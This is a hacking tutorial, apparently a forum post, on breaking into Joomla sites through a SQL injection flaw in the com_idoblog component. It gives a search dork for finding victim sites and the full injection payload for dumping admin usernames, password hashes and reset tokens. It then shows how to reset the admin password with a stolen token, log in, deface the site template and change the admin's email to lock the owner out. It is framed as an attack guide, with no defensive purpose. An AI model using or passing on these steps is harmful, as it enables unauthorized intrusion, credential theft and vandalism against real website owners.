Hacking Administrator Joomla Com_Idoblog

Hacking Administrator Joomla – Get Full Access!

Tools required:
SQL-i Knowledge
reiluke SQLiHelper 2.7
Joomla! Query Knowledge

Finding Exploit And Target

Those two steps could go in different order, depend what you find first target or exploit…

Google dork: inurl:”option=com_idoblog”

Comes up with results for about 140,000 pages

At inj3ct0r.com search for: com_idoblog

Give us back Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

==

Joomla Component idoblog 1.1b30 (com_idoblog) SQL Injection Vuln

==

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10, ​11,12,13,14,15,16+from+jos_users–

Exploit can be separated in two parts:

Part I

index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

This part opening blog Admin page and if Admin page don’t exist, exploit won’t worked (not completely confirmed)

Part II

+union+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,1​5,16+from+jos_users–

This part looking for username and password from jos_users table

Testing Vulnerability

Disable images for faster page loading:

[Firefox]

Tools >> Options >> Content (tab menu) >> and unclick ‘Load images automatically’

Go to:

Code:

http://www.site.com/index.php?option=com_idoblog&view=idoblog&Itemid=22

Site load normally…

Go to:

Code:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

Site content blog Profile Admin

Go to:

Code:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62+union+select+1--

Site is vulnerable

Inject Target

Open reiluke SQLiHelper 2.7

In Target copy

Code:

http://www.site.com/index.php?option=com_idoblog&task=profile&Itemid=1337&userid=62

and click on Inject

Follow standard steps until you find Column Name, as a result we have

Notice that exploit from inj3ct0r wouldn’t work here because it looking for jos_users table and as you can see

our target use jos153_users table for storing data

Let Dump username, email, password from Column Name jos153_users. Click on Dump Now

username: admin

email: info@site.com

password: 169fad83bb2ac775bbaef4938d504f4e:mlqMfY0Vc9KLxPk056eewFWM13vEThJI

Joomla! 1.5.x uses md5 to hash the passwords. When the passwords are created, they are hashed with a

32 character salt that is appended to the end of the password string. The password is stored as

{TOTAL HASH}:{ORIGINAL SALT}. So to hack that password take time and time…

The easiest way to hack is to reset Admin password!

Admin Password Reset

Go to:

Code:

http://www.site.com/index.php?option=com_user&view=reset

This is standard Joomla! query for password reset request

Forgot your Password? page will load.

In E-mail Address: enter admin email (in our case it is:info@site.com) and press Submit.

If you find right admin email, Confirm your account. page will load, asking for Token:

Finding Token

To find token go back to reiluke SQLiHelper 2.7 and dump username and activation from Column Name jos153_users

username: admin

activation: 5482dd177624761a290224270fa55f1d

5482dd177624761a290224270fa55f1d is 32 char verification token, enter it and pres Submit.

If you done everything ok, Rest your Password page will load. Enter your new password…

After that go to:

Code:

http://www.site.com/administrator/

Standard Joomla portal content management system

Enter username admin and your password, click on Login

Go to Extensions >> Template Manager >> Default Template Name >> Edit HTML

In Template HTML Editor insert your defaced code, click Apply, Save and you are done!!!

To make admin life more miserable, click on admin in main Joomla window and in User Details page change admin E-mail

Credit: MindFreak [HckGuide]